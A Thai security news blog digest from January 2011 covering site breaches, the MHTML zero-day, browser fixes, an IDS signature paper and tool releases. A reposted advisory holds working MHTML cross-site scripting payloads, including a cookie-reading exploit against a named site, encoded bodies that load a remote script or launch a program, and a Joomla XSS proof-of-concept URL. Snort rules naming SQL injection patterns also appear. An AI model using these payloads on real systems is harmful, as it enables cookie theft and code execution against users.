Jan 29, 2011

r00tsecurity.org และ uNKn0wn.eu โดนแฮ็ค

ทั้ง 2 เว็บนั้นเป็นเว็บ Hacker Underground ทั้งคู่  และได้มีการเปิดเผยทั้งชื่อและuser,password ของผู้ใช้ในเว็บไซด์ โดยมีรายละเอียดตาม link ข้างล่างนี้ครับ

r00tsecurity.org & uNkn0wn.eu #Hacked and Exposed  http://pastebin.com/G2c3mT9k  LOL

Source: @securityshell

Hacking with mhtml protocol handler

รายละเอียดและตัวอย่างการโจมตีผ่าน mhtml ครับ


Hacking with mhtml protocol handler

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2011/1/15
References:http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt

Ph4nt0m Webzine 0x05 (http://secinn.appspot.com/pstzine) Was finally
released yesterday, There are two articles about the browser security[0x05
and 0x06].If the combination of both, we can complete a lot of interesting
attacks...
1.Cross Site Scripting by upload mhtml file

Using the mhtml protocol handler,The file extension is ignored.so the
attacker use renname the  mhtml file to a *.jpg file,etc. then upload it to
the target site...

ofcouser ,we can use "copy /b 1.jpg + 1.mhtml 2.jpg" to bypass some upload
file format security restrictions

then use iframe tag src to it:

<iframe src="MHTML:http://target-site.com/upfile/demo.html!cookie";></iframe>
2.Cross Site Scripting mhtml-file string injection

the mhtml-file format is only base on CRLF,so if we can injection CRLF, the
site may be attacked.

poc:

test it on win7 system pls.

<iframe src="mhtml:http://www.tudou.com/my/channel/item.srv?icode=enQCgQKJTDs&callback=Content-Type%3A%20multipart%2Frelated%3B%20boundary%3D_boundary_by_mere%0D%0A%0D%0A--_boundary_by_mere%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APGJvZHk%2BDQo8aWZyYW1lIGlkPWlmciBzcmM9Imh0dHA6Ly93d3cuODB2dWwuY29tLyI%2BPC9pZnJhbWU%2BDQo8c2NyaXB0Pg0KYWxlcnQoZG9jdW1lbnQuY29va2llKTsNCmZ1bmN0aW9uIGNyb3NzY29va2llKCl7DQppZnIgPSBpZnIuY29udGVudFdpbmRvdyA%2FIGlmci5jb250ZW50V2luZG93IDogaWZyLmNvbnRlbnREb2N1bWVudDsNCmFsZXJ0KGlmci5kb2N1bWVudC5jb29raWUpDQp9DQpzZXRUaW1lb3V0KCJjcm9zc2Nvb2tpZSgpIiwxMDAwKTsNCjwvc2NyaXB0PjwvYm9keT4NCg%3D%3D%0D%0A--_boundary_by_mere--%0D%0A!cookie";></iframe>


if win-xp or win2k3 system,pls do it by the second urlencode.

mhtml-file string injection in JOSN file, some sites restrict the JOSN
file's Content-Type to defense xss. maybe we can use mhtml-file string
injection to pass it :)
3.bypass X-Frame-Options

X-Frame-Options did not protect the mhtml protocol handler.

the demo:

<iframe src="mhtml:http://www.80vul.com/mhtml/zz.php!cookie";></iframe>
<iframe src="http://www.80vul.com/mhtml/zz.php";></iframe>
4.mhtml+file://uncpath+Adobe Reader 9 == local xss vul

Billy (BK) Rios introduced a very interesting approach to Steal local files
on the RuxCon/Baythreat(https://xs-sniper.com/blog/2010/12/17/will-it-blend/)
,it used  "Script src to local files in the LocalLow directory" by file://
+java apple +Adobe Reader+Adobe flash to complete it. but if used
mhtml+file://uncpath, so easy to do it.

Demo:

test it on win2k3+ie8+Adobe Reader 9
http://www.80vul.com/hackgame/xs-g0.php?username=Administrator

5.mhtml+file://uncpath+word == local xss vul

demo:http://www.80vul.com/mhtml/word.doc

download it, and save it on c:\word.doc and open it. u can get the alert
c:\boot.ini 's content.

this is base on "Microsoft word javascript execution"(
http://marc.info/?l=bugtraq&m=121121432823704&w=2).

to make the proof of concept follow the following steps:
1-Make a html file and paste xss code2-Open the html file with the word and save as c:\word.xml3-Open the word.xml with the notepad,and inject the mhtml code in <w:t>aaaaa
</w:t>4-Rename c:\word.xml to c:\word.doc5-Open c:\word.doc file

xss code
---------------------------------------------------------
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=http://www.80vul.com/hackgame/word.htm></OBJECT>
aaaaa
----------------------------------------------------------

mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":

--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64

PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K
--_boundary_by_mere--

*/
--------------------------------------------------------

if u use this vul to attack someone,u need to known the word file path where
save the download file. and lots of guns used on the desktop :)

"Microsoft word javascript execution" is only work on office 2k3 and 2k7, In
other versions u can make the link, and src tohttp://www.80vul.com/hackgame/word.htm
6. Coss Zone Scripting

First we would like to mention a very old vulnerability:

<OBJECT CLASSID=CLSID:12345678-1234-4321-1234-111111111111
CODEBASE=c:/winnt/system32/calc.exe></OBJECT>

This vulnerability (by firebug9[http://hi.baidu.com/firebug9/blog/item/b7627c4624cd880f6a63e5e7.html])
allows you to execute any program on "My Computer" zone,Been tested and
found to this vul work on ie6/ie7/ie8+win2k/winxp/win2k3

Then repeat "5.mhtml+file://uncpath+word == local xss vul" steps and change:

xss code
---------------------------------------------------------
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=mhtml:file://c:/word.doc!cookie></OBJECT>
aaaaa
----------------------------------------------------------

mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":

--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64

PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==
--_boundary_by_mere--

*/
--------------------------------------------------------

Source: http://seclists.org/fulldisclosure/2011/Jan/224

Zero day vulnerability found in Windows MHTML renderer

พบช่องโหว่ใน Windows MHTML Renderer ซึ่งทำให้สามารถรัน command ได้ในทุก Zone ของ Windows และทาง Microsoft ก็ได้ปล้อย tool fix ช่องโหว่นี้ออกมาให้ก่อน  แต่คาดว่า Windows Update คราวหน้าจะมีมาให้


Microsoft Fix it for MHTML flawMicrosoft has just released security advisory 2501696 acknowledging a new zero day flaw in all current versions of Windows (except Server Core). The flaw appears to allow maliciously crafted web pages to execute code in any "zone" regardless of which zone is specified.
Any applications that use Microsoft's HTML renderer can be attacked including Internet Explorer, but applications that always open web content in the "Restricted zone" are not affected including Outlook, Outlook Express, and Windows Mail.
There is proof of concept code in the wild and it seems to be only a matter of time before we see criminals trying to exploit this flaw. For individuals, or people who only manage a small number of computers, Microsoft has provided a Fix it tool that allows to to apply their recommended settings without having to use GPOs or having to manually edit registry keys.
The SANS Internet Storm Center has posted a blog on this as well, noting all the current locations for information on this vulnerability.
Microsoft has provided mitigation advice and I highly recommend you consider deploying the mitigation settings using Group Policy Objects (GPOs) as soon as possible. It will likely be some time before Microsoft is able to release a patch for this vulnerability and this is one of the cases where it is likely worth the effort to implement the mitigations.

Source: http://nakedsecurity.sophos.com/2011/01/28/zero-day-vulnerability-found-in-windows-mhtml-renderer/

Opera Fix Large HTML Form Vulnerability and Release Opera 11.01

Opera ออก Version ใหม่เพื่อทำการ fix ช่องโหว่ HTML ขนาดใหญ่ใน v11.01

Opera Logo

A few days ago we wrote about a crash in the Opera web browser that could lead to memory corruption and leave the browser open for arbitrary code to be executed. The bug was reported by Jordi Chancel on January 7th and revolves around an integer truncation error when handling a HTML “select” element containing an overly large number of children.
Shortly after publishing our post Opera Software left us a comment:
From Opera Software: The newest version of the Opera desktop browser released today, 11.01, contains a security fix for this bug. You can download Opera 11.01 from http://www.opera.com/browser/
According to the 11.01 change log, six security issues where fixed in the 11.01 release including “fixed an issue where large form inputs could allow execution of arbitrary code, as reported by Jordi Chancel”.
The advisory on Opera’s web site says that “when certain large form inputs appear on a web page, they can cause Opera to crash. In some cases, the crash can lead to memory corruption, which could be used to execute code. To inject code, additional techniques will have to be employed.” They also go on to thank Jordi Chancel for reporting the issue.
Opera 11 was released last month and introduced tab stacking, extensions, visual mouse gestures and most importantly, from a security point of view, a redesigned address field which displays a clear badge indicating the security level of the web site.

Source: http://www.livehacking.com/2011/01/28/opera-fix-large-html-form-vulnerability-and-release-opera-11-01/

SourceForge Site Compromised By Attackers

เมื่อวันพุธที่ผ่านมา SourceForge เจ้าพ่อ Open Source Project ได้ถูกโจมตีและขณะนี้กำลังมีความพยายามที่จะสืบหาสาเหตุและผลกระทบอยู่ครับ โดยได้มีการไปเปลี่ยนแปลงค่าต่างๆรวมถึง CVS System ด้วย

The recent rash of attacks against free and open source software projects continued this week with an attack that targeted SourceForge, the popular repository for open source projects. The attack compromised a number of separate systems, including the site's CVS system.
The administrators at SourceForge detected the intrusion on Wednesday and during the investigation, they discovered that the attackers had succeeded in gaining access to several machines. After the attack was discovered, they quickly took a number of services offline, including the CVS system, Web-based code browsing, file upload capability and interactive shell services.
"Our immediate priorities are to prevent further exposure and ensure data integrity.  We have all hands on deck working on identifying the exploit vector or vectors, eliminating them, and restoring the impacted services," the SourceForge staff wrote in a blog post on the attack.

"The problem was initially discovered on the servers that host CVS but our analysis indicates that several other machines were involved, and while we believe we’ve determined the extent of the attack, we are verifying all of our other services and data."
On Thursday, SourceForge staffers said that they still were in the process of trying to determine the full extent of the attack and that several service were offline still.
"CVS, ViewVC, file release uploads, and interactive shell services are still disabled while we do the work to make sure our servers and services are hardened against future attacks like this," the staff said.
SourceForge is a resource site that enables developers to store projects under development and also serves as a download site for users.
The attack against SourceForge is the latest in what's become a string of such incidents affecting free and open-source software projects. Earlier this week officials at the Fedora Project disclosed an attack against the project's infrastructure. That incident was relatively minor, in that it resulted from the compromise of one user's account credentials and the attacker didn't make any changes to the Fedora packages.
In December attackers were able to compromise the main server used to distribute the ProFTPD software and insert a backdoor into the software code. The backdoored version of the software was mirrored to all of the other sites that distribute the software and the compromised version was available for download for several days before the intrusion was discovered.

Source: http://threatpost.com/en_us/blogs/sourceforge-site-compromised-attackers-012811

อดีตพนักงาน Kaspersky รับผิดชอบในเรื่อง Source Code [Former Kaspersky Employee Responsible for Leaked Source Code]

หลังจากมีข่าวออกมาก่อนหน้านี้ว่า Source Code kaspersky Anti-Virus 2008 หลุดออกมาก่อนหน้า ทางโฆษกของทาง Kaspersky ก็ได้ออกมาบอกว่า Source Code นั้นถูกขโมยตั้งแต่ต้นปี 2008 โดยพนักงานเก่านั่นเอง


ซึ่งพนักงานคนนั้นก็ได้ถูกจับในเวลาต่อมาและได้ถูกตัดสินจำคุก 3 ปีด้วยกัน

 

รายละเอียดตามด้านล่างครับ






Kaspersky Lab reveals that former employee stole source code
Enlarge picture
The Kaspersky source code that recently made its way onto public websites was leaked by a former employee of the antivirus vendor, who is already serving a prison sentence for intellectual property theft.

Yesterday, we reported about the complete source code of an older Kaspersky product being available on publicly accessible torrent and file hosting sites.

The code was last modified in December 2007 and judging by the directory tree it probably corresponds to a beta version of Kaspersky Internet Security 8.0.

Russian technology publication CNews quotes [Google translation] a Kaspersky Lab spokesperson, according to whom a former employee with legitimate access to the source code stole it in early 2008.

It's not clear if he did it out of revenge or entirely for profit, but he ended up offering it for sale on the black market.

The former worker was subsequently arrested and sentenced to three years in jail, to be followed by another three of supervised release.

Kaspersky stressed the security of its current products was not at risk because they only contained small parts of the leaked code which didn't concern protection functions.

It is likely that having knowledge of the leak for almost two years, the company rewrote the most critical parts of the code and made significant changes to its technology.

In addition, the vendor was aware the leaked sources were being distributed on private forums since November 2010, so it probably anticipated a full-blown public exposure.

People should be aware that even if publicly available, the source code remains the intellectual property of Kaspersky Lab and downloading, distributing or using it without consent is illegal.

The company has yet to respond to our inquiries or issue a public statement in English. We will keep you up to date with new information when it becomes available.

Source: http://news.softpedia.com/news/Former-Kaspersky-Employee-Responsible-for-Leaked-Source-Code-181367.shtml

Generic Attack Detection Engine

บทความเกี่ยวกับการสร้าง Rule IDS/IPS เพื่อใช้ในการป้องกัน Web Attack ครับ

 

“Generic Attack Detection Engine”

Abstract
This paper covers a new technique that can help IDS/IPS solution developers to provide more protection against web attacks. The approach is very generic and can be “adopted” by any IDS/IPS solution provider. Presently the approach is just an Idea and it requires more research and experiment to convert it into a working solution.
This approach helps in enhancing quality of “signature based IDS/IPS solution” and provides good coverage with respect to the evasion techniques.
Introduction
There are some web attacks that can be performed against different applications, let us name them as “Generic Attacks”. Also these attacks involve evasion techniques to bypass the IDS/IPS signature based protection mechanism.
Generic Attacks Name:-
  1. Cross Site Scripting
  2. SQL Injection
  3. Shell Code Execution
  4. Directory Traversal
  5. Buffer overflow
  6. Remote File Inclusion

Presently, most of the signature based IDS/IPS solution providers provides one signature per vulnerability or they may write some more signatures for same vulnerability to cover the evasion techniques but most of the IDS/IPS solutions are following this approach.
This approach allows the attacker to bypass the IDS/IPS detection using evasion techniques.
There are some other limitations of current approach which are covered below under “Problem” heading.
Problem
To explain the problem more clearly let me start with an example:-
Threat Information: – Cross-Site Scripting (XSS) vulnerability in the com_search module for Joomla! 1.0.x through 1.0.15 allows remote attackers to inject arbitrary web script or HTML via the ordering parameter to index.php.
In above vulnerability we can see that “Joomla” application is vulnerable to XSS attack via “ordering” parameter.
Sample POC/Exploit for above vulnerability
http://attacker.in/joomla1015/index.php?option=com_search&searchword=xss&searchphrase=any&ordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22
Above mentioned POC is just one XSS type of case and there are many other evasion techniques that attacker can use to conduct the attack, but vulnerable parameter “ordering” remains the same in other XSS cases.
To detect the above attack signature developer writes a single signature or multiple signatures to cover some XSS evasion techniques. But there are very high chances that developer may miss to cover some evasion techniques or in many cases he/she may not be able to write multiple signatures due to the performance issues of detection engine, as more number of signatures involves more processing time.
A sample IDS signature (Snort Rule) that a developer can write to detect the above malicious URL is as below:-
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:”Joomla XSS Attack”; flow:established,to_server; content:”index.php“; nocase; http_uri; content:”ordering=“; nocase; http_uri; pcre:”/ alert\x28document\.cookie\x29\x20style /smi”; metadata:policy security-ips alert, service http; classtype:web-application-attack; sid:15 )
Same approach is followed while developing the signatures for other attacks.
Also one important point here is that the way XSS attack is conducted is mostly common across the applications, only thing that vary is parameter, argument or function, like in above mentioned vulnerability parameter is “ordering” and in case of XSS vulnerability in other application this parameter can be something else let’s say “userid”.
Snort rules:-
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:”WEB-PHP phpBB mod tag board sql injection attempt”; flow:established,to_server; content:”tag_board.php“; fast_pattern; nocase; http_uri; content:”action=delete”; nocase; http_uri; content:”id=”; nocase; http_uri; pcre:”/tag_board.php\x3F[^\r\n]*action=delete[^\r\n]*id=[^\r\n\x26]*(select|insert|delete)/Usmi”; threshold:type limit, track by_src, count 1, seconds 300; metadata:policy security-ips alert, service http; reference:bugtraq,32701; reference:cve,2008-6314; classtype:web-application-attack; sid:15425; rev:5;)
In above snort rule, signature is only covering one evasion technique to detect the SQL injection.
Although there are many other ways using which attacker can bypass this detection rule.
For example: – Attacker can provide the select, insert and delete query via using comment /**/ within the keyword as S/**/E/**/L/**/ECT which gets normalize as SELECT later on database side. As we can see that this is not covered by above signature.
This is just one way of performing SQL injection and there are many more ways that attacker can use to conduct the attack. For more details you can search for SQL injection Evasion Techniques.
Like the above rule you can find some more signatures which are having same limitations.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:”SQL generic sql with comments injection attempt – GET parameter”; flow:to_server,established; content:”/*”; http_uri; content:”*/”; http_uri; pcre:”/(update|exec|insert|union)[^\/\\]*\/\*.*\*\//Uis”; metadata:service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:16431; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:”SQL generic sql insert injection atttempt – POST parameter”; flow:established,to_server; content:”insert “; fast_pattern; nocase; http_client_body; pcre:”/insert\s+into\s+[^\/\\]+/Pi“; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:15875; rev:5;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:”SQL generic sql update injection attempt – GET parameter”; flow:established,to_server; content:”update”; fast_pattern; nocase; http_uri; pcre:”/update\s+[^\/\\]+set\s+[^\/\\]+/Ui”; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13514; rev:11;)
Weaknesses and Limitations found in current scenario:-
  1. If some new evasion technique is discovered that conducts web attack (like SQL injection) then in that case a new IDS/IPS signature have to be released for all the applications which has SQL injection vulnerabilities. So, developer has to write one new signature for all the applications to provide the protection. There is no single point where we can patch the entire signatures against this new evasion technique.
  2. False Negative chances are high in current scenario as IDS/IPS signature written for vulnerability can possibly miss to cover some evasion techniques during signature development phase or due to performance limitation of IDS/IPS detection engine.
  3. In current approach it is difficult for IDS/IPS solution provider to provide quality assurance parameters per vulnerability like how many evasion techniques or which evasion techniques their signatures are covering for a particular vulnerability. Providing such information per vulnerability is difficult.
Brief about signature development:-
Before writing the signature for vulnerability we first find the parameter, argument or function which has the flaw. Now, while writing the signature we first match this parameter and then match the attack pattern using either content matching or using PCRE.
Here, for above explained Joomla XSS attack I am writing a sample signature:-
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:”Joomla XSS Attack”; flow:established,to_server; content:”index.php“; nocase; http_uri; content:”ordering=“; nocase; http_uri; pcre:”/ alert\x28document\.cookie\x29\x20style /smi”; metadata:policy security-ips alert, service http; classtype:web-application-attack; sid:15 )
Here I have match the parameter “ordering” and then match the attack pattern using PCRE.
We match parameter first to reduce the PCRE matching on whole traffic to improve the performance and reduce false positive chances. Direct PCRE matching on real traffic is very performance intensive.
Idea
Generic Detection Algorithm/Engine: – What I am suggesting is that, we can develop some generic detection algorithm/engine for each such generic attack and call them whenever they are required.
Like in above case instead of matching the malicious pattern using a single PCRE we can call “XSS detection algorithm/engine” that covers all the possible XSS evasion techniques.
There are multiple advantages of developing and using such attack detection algorithm/engine:-
  1. Reusability:-The advantage of developing such engine is that we can call it for any application which is vulnerable to such attack.
  2. Signature Patching: - In case some new evasion technique is introduced to conduct the attack then it’s only needed to enhance the detection engine to cover this new evasion technique instead of what we do right now by developing a new signature for all the applications. At the same time, it will reduce false negative chances. Also, it helps in providing “Zero Day” protection.
  3. Accountability: - With the help of such detection algorithm/engine we are sure about how many evasion techniques are covered per vulnerability.
  4. 4. Quality Assurance: - Using such detection algorithm/engine we are very sure and confident about the quality of our signature coverage.
  5. Performance Enhancement: - We can optimize the algorithm and also use some special hardware to run, which can help in improving the performance of IDS/IPS detection solution.
  6. Automation: - Signature development process can be automated once we have the stable detection engine for attack.
Details:-
Flow Diagram:-
Basic Architecture of Generic Detection Engine
Following architecture diagram it to give you a little Idea about how the generic detection approach can work.
In above diagram we have two branches after Content/Pattern Match one is “Normal Detection” and another one is “Generic Detection Engine”.
For generic attacks we are having six different attack detection engines which can be called as per the detection requirement. Each individual detection engine cover all the possible evasion techniques related to the respective attack.
Like XSS engine is capable of detecting all type of XSS attack evasions.
These detection engines are called during signature matching for the detection of malicious patterns and return the result.
For all other type of attacks we have our normal detection engine that works like current detection logic that includes further Content/PCRE matches.
Detection Levels:-
We can define some detection levels in attack detection engine like low, medium and high. In case if we want to drop some evasion techniques at the cost of appliance performance then there has to be some possibility within engine using which we are able to drop some evasion techniques.
Detection Engine Parameters: – Possible parameters that the detection engine can have are mentioned as below:-
New Construct For IDS/IPS Signature
From signature development language/syntax point of view we can have some new constructs like as below “engineid” and “detectionlevel” that can support the new generic detection engine. This is just one way that I am thinking of but there can be some other ways also to integrated/implement the new approach.
OLD RULE:-
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:”Joomla XSS Attack”; flow:established,to_server; content:”index.php“; nocase; http_uri; content:”ordering=“; nocase; http_uri; pcre:“/ alert\x28document\.cookie\x29\x20style /smi”; metadata:policy security-ips alert, service http; classtype:web-application-attack; sid:15 )
NEW RULE:-
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:”Joomla XSS Attack”; flow:established,to_server; content:”index.php“; nocase; http_uri; content:”ordering=“; nocase; http_uri; engineid:1;detectionlevel:high;metadata:policy security-ips alert, service http; classtype:web-application-attack; sid:15 )
Now as you can see that instead of “pcre” match I am using an “engineid” and “detectionlevel” which is the ID of XSS engine. First signature perform the content matching “index.php” and “ordering=” once it’s matched after then “XSS engine” is called to match for all the possibilities of XSS evasion techniques and return the result. If any match succeeds then signature is triggered.
Here, using new approach there is no need to write the multiple signatures for different-2 evasion techniques. All of this is taken care by generic detection engine.
Conclusion and Further Work
I believe that this approach helps a lot in IDS/IPS solution development and improve the quality of signatures with respect to the evasion techniques. Using this new approach we can overcome the current approach flaws and limitations.
Lot of work is required to actually make this approach as a working solution. Nothing has been tested and implemented yet. So we need to do some experiments to test how this approach works. Once we have some good results then we need to find a way to implement this approach into a working solution. 

Source: http://www.packetcomputing.com/blog/?p=50

Nmap v.5.50 Released

NMAP Tool scan ที่นิยมมากที่สุดได้ปล่อย Version 5.50 ออกมาครับ


A primary focus of this release is the Nmap Scripting Engine, which has allowed Nmap to expand up the protocol stack and take network discovery to the next level. Nmap can now query all sorts of application protocols, including web servers, databases, DNS servers,FTP, and now even Gopher servers! Remember those? These capabilities are in self-contained libraries and scripts to avoid bloating Nmap's core engine.

The actual NSE engine became more powerful as well. Newtargets support allows scripts like dns-zone-xfer and dns-service-discovery to add discovered hosts to Nmap's scan queue. We also added a brute forcing engine, network broadcast script support, and two new script scanning phases known as prerule and postrule.
This release isn't just about NSE. We also added the Nping packet probing and analysis tool (http://nmap.org/nping/) in 5.35DC1.Version 5.50 improves Nping further with an innovative new echo mode (http://bit.ly/nping-echo).

Download: http://nmap.org

Source: http://security-sh3ll.blogspot.com/2011/01/nmap-v550-released.html

Jan 28, 2011

Nessus ออกเวอร์ชั่นสำหรับ iPhone

 Nessus ซึ่งเป็น Tools สำหรับ Audit ระบบ ได้ออกเวอร์ชั่นสำหรับ iPhone ครับ  สามารถหาโหลดได้ที่ iTunes store แบบฟรีครับ

Free Nessus App for the iPhone


The Nessus App for iPhone is a great way to keep tabs on running Nessus scans, initiate new scans, and quickly review vulnerability scanning results. The app is available for free in the iTunes store and works with Nessus server versions 4.2 or later and the Nessus PerimeterService. Below is a short video showcasing its features:

Source: http://koresecure.com/?p=4448

Jan 27, 2011

Hackers Turn Back the Clock With Telnet Attacks

Hacker กลับมาใช้ Telnet โจมตี server ต่างๆผ่านเครือข่ายมือถือ  หากใครมีการเปิด Port 23 สำหรับ Telnet อยู่ละก็ เปลี่ยนไปใช้ SSH ดีกว่าครับ  ปลอดภัยกว่ากันเยอะเลย

Hackers Turn Back the Clock With Telnet Attacks

A new report from Akamai Technologies shows that hackers appear to be increasingly using the Telnet remote access protocol to attack corporate servers over mobile networks.
Similar Articles:
Akamai, which specializes in managing content and Web traffic, issues quarterly reports on Internet traffic trends. The latest report, which covers the third quarter of 2010, shows that 10 percent of attacks that came from mobile networks are directed at Port 23, which Telnet uses. That marks a somewhat unusual spike for the aging protocol.
Telnet is a remote access tool used to log into remote servers, but it has been gradually replaced by SSH, also known as Secure Shell. Administrators are generally advised to disable Telnet if the protocol is not used to prevent attacks targeting it, but some forget.
Although those attacks originated from mobile networks, Akamai said it did not appear that mobile devices were the source.
"As noted previously, we believe that the observed attack traffic that is originating from known mobile networks is likely being generated by infected PC-type clients connecting to wireless networks through mobile broadband technologies and not by infected smartphones or similar mobile devices," according to the report.
Including all types of attack traffic sources, about 17 percent of attacks were directed at Telnet. Port 23 was "overwhelmingly the top targeted port for attacks" in Egypt, Peru and Turkey, Akamai said.
"It is not clear if there is a common thread that connects these three countries, nor whether these observed attacks were brute-force login attempts or some other botnet-related traffic," the report said.
Akamai found that Port 445, which is a commonly used port for Microsoft products, was the most targeted one, although the attacks declined. The attacks peaked more than a year ago due to Conficker, a worm that rapidly spread and targeted the port.
"While the percentages are still fairly significant, this decline may signal ongoing efforts by network service providers to identify and isolate infected systems, as well as ongoing efforts to patch and/or upgrade infected systems," the report said.
Port 445 attacks were responsible for much of the attack traffic in Brazil, Germany, Italy, Russia, Taiwan and the US. In China, however, attacks against SSH, which runs on Port 22, were more common than those against Port 445, Akamai said.

Source: http://www.pcworld.com/businesscenter/article/217922/hackers_turn_back_the_clock_with_telnet_attacks.html

Malicious Iframe infects PHP-Nuke site....again!

PHP Nuke Official site โดนฝัง Malicious IFrame(IFrame ที่ประสงค์ร้าย)มาตั้งแต่วันที่ 17/01/2011 ที่ผ่านมา  แต่จน ณ ปัจจุบันก็ยังไม่มีการแก้ไขเอาออกไปครับ

ข่าวด้านล่างเป็นข่าวตั้งแต่วันที่ 17/01/2011 ที่ผ่านมาครับ



Last May, I blogged about PHP-Nuke's official site being hacked. Imagine my surprise when I saw the site come up again in my malware feed.
I looked for the contact details on the site and found that I would have to register in order to give them details of the hack and advice on how to clean up. Doing so would risk giving, at the very least, my email address to the hackers who had compromised the security. Not surprisingly, I declined that tempting offer.
The WHOIS for the website shows that the Registrant is "Domains by Proxy, Inc." and from my many years experience in analysing spam, I am now accustomed to expecting the worst from sites registered with this type of name. Back to square one...again.
Detection-scan for phpnuke
So why am I blogging about the site hack without first informing the owner?
  • They have previous history in leaving the door open to attacks
  • Publishing articles and giving them a spotlight is a surefire way of getting them to fixing the issue
  • They seem not to have learned the lessons of their previous security breach.
In my previous blog entry"What does PHP stand for? Probable Hacked Page?", the attack is similar. Here is the current version:
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
You will see that the Apache and SSL versions have been upgraded (probably due to the OS), but the PHP version has not. The PHP site says that they currently have two versions released (5.3.5 and 5.2.17).


Source: http://nakedsecurity.sophos.com/2011/01/17/malicious-iframe-infects-php-nuke-site-again/

Cross Site Scripting on Facebook!!!

พบช่องโหว่ XSS บน Facebook ครับ ปิดไปแล้วหนึ่งและยังไม่ปิดอีกหนึ่งครับ

XSS on Facebook.com, fix one and unfix one(27/01/2011 21:09 +7)



Source: http://www.xssed.com/

Mark Zuckerberg fan page hacked on Facebook: What really happened?

หลังจากที่มีข่าวเมื่อวานวาน Facebook Fan Page ของ Mark Zuckerberg โดน hack เมื่อวานปรากฎว่าเกิดจากการทำงานผิดพลาดของ API ทำให้ Hacker สามารถเข้าไปโพสต์ใน Wall ดังกล่าวได้  ซึ่งอันนี้ก็ไม่แน่ใจว่าเป็นช่องโหว่เดียวกับที่ทำให้ Facebook Fan Page ของประธานาธิบดีของฝรั่งเศส Nicolas Sarkozy โดนด้วยหรือไม่(ประมาณอาทิตย์ที่ผ่านมา)  แต่ที่แน่ๆก็คือทาง Facebook Security Team ได้ทำการ Fix bug ดังกล่าวเรียบร้อยแล้วครับ

There was a lot of hoo-ha and speculation yesterday after Mark Zuckerberg's official Facebook fan page was updated with an unauthorised post.
Mark Zuckerberg hacked
At first Facebook declined to comment on what - at first glance - appeared to be an embarrassing security faux pas by Zuckerberg or one of his staff authorised to update the page. Understandably there was speculation that Zuckerberg or one of his colleagues might have had their passwords guessed or stolen, or perhaps had been 'sidejacked' by a tool such as FireSheep while using an unencrypted free WiFi hotspot.
Those were certainly our first thoughts, but now new information shared by Facebook's security team with the press tells a different story.
For instance, CNET's Elinor Mills reports that Facebook discovered that an API bug allowed unauthorised parties to post status updates to public Facebook fan pages.
This meant that personal information wasn't stolen from anyone's Facebook account - which is a very good thing.
So, it wasn't a story of a 26-year-old logging in at Starbucks and not realising that someone could be intercepting the communications. And it wasn't a tale of a junior member of staff choosing a password like "123456789" for their Facebook account, and being given the keys to administer a page with 2.8 millions fans.
Those kind of mistakes aren't uncommon, of course, and are security issues which you should be mindful of if you are responsible for the protection of computers and online activity inside your own organisation.
Instead, it turns out that the true story of the Zuckerberg fan page hack is much worse. Because a vulnerability in the way that Facebook was coded allowed unauthorised parties to post updates to pages, which could have potentially been used for the purposes of phishing, spam and even malicious attack.
Because it wasn't just Zuckerberg's fan page which was affected. Facebook declined to say which other pages had been hit by hackers exploiting the vulnerability - but it appears that other "high-profile" pages were also impacted. Facebook has not revealed whether they believed that French President Nicolas Sarkozy's fan page (which was also breached earlier this week) had been affected by the same bug.
So, what does this mean for you if you're a sysadmin responsible for securing your company's Facebook presence?
Well, the good news is that Facebook says the API bug has now been fixed. They haven't, however, said if they have informed the owners of any other Facebook fan pages or removed posts which may have been published via the flaw.
So, if you are the administrator of a popular page on Facebook it wouldn't do any harm to check that all is in order. You may also want to ensure that your public forums are regularly monitored just in case a similar incident occurs in the future, which might result in your Facebook fans receiving unauthorised updates.
After all, would the API vulnerability have been found so promptly if it hadn't impacted the official fan page of Facebook's CEO?
Furthermore, now would be a good time to audit your Facebook page administrators - ask yourself who has access to post to your company's pages and are they following sensible security practices (such as unique, hard-to-crack passwords and use of https when accessing the site).
Accessing Facebook via https
This may not have been the issue in the case of the Zuckerberg fan page defacement, but it still makes a lot of good sense to follow these guidelines inside your company.

Source :: http://nakedsecurity.sophos.com/2011/01/27/mark-zuckerberg-fan-page-hacked-on-facebook-what-really-happened/

วิธีการ Chroot Jail Apach2 ด้วย mod_chroot

Description mod_chroot

